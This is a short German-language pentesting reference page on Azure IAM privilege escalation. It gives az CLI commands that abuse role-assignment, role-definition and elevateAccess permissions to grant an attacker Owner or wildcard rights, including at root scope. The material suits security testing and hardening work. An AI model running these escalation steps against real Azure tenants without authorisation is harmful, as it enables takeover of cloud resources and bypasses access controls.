Az - Azure IAM Privesc (Authorization)

Azure IAM

Für weitere Informationen siehe:

Microsoft.Authorization/roleAssignments/write

Diese Berechtigung erlaubt es, Rollen an Prinzipale über einen bestimmten Geltungsbereich zuzuweisen, was einem Angreifer ermöglicht, Privilegien zu eskalieren, indem er sich selbst eine privilegiertere Rolle zuweist:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

Diese Berechtigung ermöglicht es, die von einer Rolle gewährten Berechtigungen zu ändern, wodurch ein Angreifer die Privilegien erhöhen kann, indem er einer zugewiesenen Rolle weitere Berechtigungen gewährt.

Erstellen Sie die Datei role.json mit dem folgenden Inhalt:

{
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": [
"*"
],
"NotActions": [],
"DataActions": [
"*"
],
"NotDataActions": [],
"AssignableScopes": [
"/subscriptions/<subscription-id>"
]
}

Dann aktualisieren Sie die Rollenberechtigungen mit der vorherigen Definition, indem Sie aufrufen:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

Diese Berechtigung ermöglicht es, Privilegien zu erhöhen und Berechtigungen für beliebige Prinzipale zu Azure-Ressourcen zuzuweisen. Sie ist dafür gedacht, Entra ID Global Administratoren zugewiesen zu werden, damit sie auch Berechtigungen für Azure-Ressourcen verwalten können.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"